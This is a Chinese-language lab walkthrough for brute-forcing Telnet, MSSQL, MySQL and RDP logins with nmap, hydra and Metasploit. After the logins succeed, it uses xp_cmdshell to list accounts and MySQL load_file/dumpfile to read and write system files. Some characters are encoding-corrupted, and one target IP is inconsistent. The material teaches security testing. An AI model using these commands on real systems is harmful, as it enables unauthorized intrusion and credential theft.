Telnet協(xié)議暴力破解

Telnet

?????? Telnet協(xié)議是TCP/IP協(xié)議族中的一員，是Internet遠(yuǎn)程登陸服務(wù)的標(biāo)準(zhǔn)協(xié)議和主要方式。它為用戶提供了在本地計(jì)算機(jī)上完成遠(yuǎn)程主機(jī)工作的能力。要開始一個telnet會話，必須輸入用戶名和密碼來登錄服務(wù)器。而一般服務(wù)器不會對用戶名和密碼的登錄嘗試做限制，因此可以通過多次嘗試密碼的方式對Telnet服務(wù)器進(jìn)行暴力破解。

Telnet協(xié)議暴力破解利用

靶機(jī)IP地址：193.168.1.27

打開NMAP，輸入命令nmap -v -A -Pn 193.168.1.27，對該IP地址進(jìn)行掃描。

使用hydra進(jìn)行暴力破解。輸入如下命令：

hydra 193.168.1.27 telnet -l admin -P /tmp/pass.txt -t 32 -s 23 –V

嘗試登錄telnet服務(wù)器，輸入如下命令：

telnet 193.168.1.27 23，用戶名密碼分別輸入admin和admin888

?登錄服務(wù)器后可嘗試一些常用系統(tǒng)命令，如ipconfig，查看回顯。

數(shù)據(jù)庫暴力破解

Mssql暴力破解原理

MSSQL是微軟的SQLServer數(shù)據(jù)庫服務(wù)器，是用于電子商務(wù)、業(yè)務(wù)線和數(shù)據(jù)倉庫解決方案的數(shù)據(jù)庫管理和分析系統(tǒng)。用戶可以通過輸入用戶名和密碼來登錄數(shù)據(jù)庫服務(wù)器。而一般服務(wù)器不會對用戶名和密碼的登錄嘗試做限制，因此可以通過多次嘗試密碼的方式對MSSQL服務(wù)器進(jìn)行暴力破解。

MSSQL暴力破解漏洞利用

靶機(jī)IP地址：193.168.1.24

開啟kali-linux虛擬機(jī)，打開命令行窗口運(yùn)行NMAP，輸入命令nmap -v -A -Pn 193.168.1.24，對該IP地址進(jìn)行掃描。

使用Metasploit進(jìn)行暴力破解。輸入msfconsole打開Metasploit。

?輸入search mssql_login，搜索mssql_login模塊。

?輸入use auxiliary/scanner/mssql/mssql_login，加載mssql_login模塊。

?輸入show options，顯示mssql_login模塊的參數(shù)。

?使用set命令設(shè)置暴力破解目標(biāo)數(shù)據(jù)庫的相關(guān)參數(shù)。

?輸入exploit開始攻擊，成功獲取密碼，為123456。

?輸入select @@version，再輸入go，成功獲取目標(biāo)數(shù)據(jù)庫版本信息。

在mssql數(shù)據(jù)庫中存在一個xp_cmdshell組件，利用該組件可以執(zhí)行系統(tǒng)命令。輸入如下命令：exec master.dbo.xp_cmdshell 'ipconfig'，再輸入go，可以發(fā)現(xiàn)ipconfig成功執(zhí)行，獲取目標(biāo)操作系統(tǒng)的ip信息。

?輸入exec master.dbo.xp_cmdshell 'net user'，再輸入go，成功獲取目標(biāo)操作系統(tǒng)賬戶信息。

Mysql暴力破解原理

????????MySQL是一個關(guān)系型數(shù)據(jù)庫管理系統(tǒng)，是目前最流行的關(guān)系型數(shù)據(jù)庫管理系統(tǒng)。MySQL 是一種關(guān)聯(lián)數(shù)據(jù)庫管理系統(tǒng)，關(guān)聯(lián)數(shù)據(jù)庫將數(shù)據(jù)保存在不同的表中，而不是將所有數(shù)據(jù)放在一個大倉庫內(nèi)，這樣就增加了速度并提高了靈活性。MySQL 所使用的 SQL 語言是用于訪問數(shù)據(jù)庫的最常用標(biāo)準(zhǔn)化語言。由于其體積小、速度快、總體擁有成本低，尤其是開放源碼這一特點(diǎn)，一般中小型網(wǎng)站的開發(fā)都選擇 MySQL 作為網(wǎng)站數(shù)據(jù)庫。用戶可以通過輸入用戶名和密碼來登錄數(shù)據(jù)庫服務(wù)器。而一般服務(wù)器不會對用戶名和密碼的登錄嘗試做限制，因此可以通過多次嘗試密碼的方式對Mysql服務(wù)器進(jìn)行暴力破解?

Mysql暴力破解漏洞利用

靶機(jī)IP地址：193.168.1.38

打開NMAP，輸入命令nmap -v -A -Pn 193.168.1.38，對該IP地址進(jìn)行掃描。

使用Metasploit進(jìn)行暴力破解。輸入msfconsole打開Metasploit。

?輸入search mysql_login，搜索mysql_login模塊。

?輸入use auxiliary/scanner/mysql/mysql_login，加載mysql_login模塊。

輸入show options，顯示mysql_login模塊的參數(shù)。

使用set命令設(shè)置暴力破解目標(biāo)數(shù)據(jù)庫的相關(guān)參數(shù)。

?輸入exploit開始攻擊，成功獲取密碼，為admin888。

?在本機(jī)打開命令行，輸入mysql -h 193.168.1.38 -u root –p，輸入密碼admin888，嘗試登錄mysql服務(wù)器。

輸入show databases;（注意最后需加一個分號，分號為sql語句中的分隔符），獲取數(shù)據(jù)庫名。

?輸入select load_file(‘C:\\boot.ini’);，讀取C:\\boot.ini啟動文件的內(nèi)容。

?輸入select ‘1111’ into dumpfile ’C:\\2.txt’;，在C盤下新建一個2.txt并向其中寫入111。

?為證明確實(shí)創(chuàng)建了該文件，可再次利用load_file函數(shù)讀取2.txt文件。輸入select load_file(‘C:\\2.txt’);。?

遠(yuǎn)程桌面暴力破解

遠(yuǎn)程桌面暴力破解漏洞介紹

遠(yuǎn)程桌面協(xié)議介紹

遠(yuǎn)程桌面協(xié)議（RemoteDesktopProtocol）是讓客戶端連接遠(yuǎn)程服務(wù)器桌面的協(xié)議。3389端口是windows遠(yuǎn)程桌面服務(wù)的默認(rèn)端口。一般用戶可以通過管理員用戶名密碼訪問開放3389端口的計(jì)算機(jī)的遠(yuǎn)程桌面進(jìn)行管理。

遠(yuǎn)程桌面暴力破解漏洞產(chǎn)生

開放遠(yuǎn)程桌面協(xié)議服務(wù)

沒有限制登錄來源地址

沒有限制密碼錯誤次數(shù)

遠(yuǎn)程桌面暴力破解漏洞危害

3389端口很容易通過各種掃描工具得到，由于一些計(jì)算機(jī)使用者缺乏安全意識經(jīng)常給administrator帳戶設(shè)置弱密碼，這樣攻擊者可以暴力破解獲取密碼后進(jìn)一步控制計(jì)算機(jī)。

遠(yuǎn)程桌面暴力破解漏洞利用

靶機(jī)服務(wù)器地址：193.168.1.27

加載kali-linux虛擬機(jī)，打開命令行窗口，利用nmap掃描靶機(jī)端口服務(wù)。

nmap -v -A -Pn 193.168.1.25

接下來利用hydra工具暴力破解此遠(yuǎn)程桌面賬戶密碼。

hydra 193.168.1.25 rdp -l admin -P /tmp/pass.txt -t 1 -V

成功獲取登錄遠(yuǎn)程桌面的密碼，為admin888。

利用遠(yuǎn)程桌面連接工具登錄此靶機(jī)服務(wù)器。

通過鍵盤上的win+R組合鍵打開“運(yùn)行界面”，輸入“mstsc”打開遠(yuǎn)程桌面連接界面。mstsc（Microsoft terminal services client）是微軟遠(yuǎn)程服務(wù)客戶端軟件。

計(jì)算機(jī)名輸入193.168.1.25，點(diǎn)擊連接。

??輸入上面獲取的用戶名和密碼，點(diǎn)擊“確定”登錄。成功登上目標(biāo)系統(tǒng)。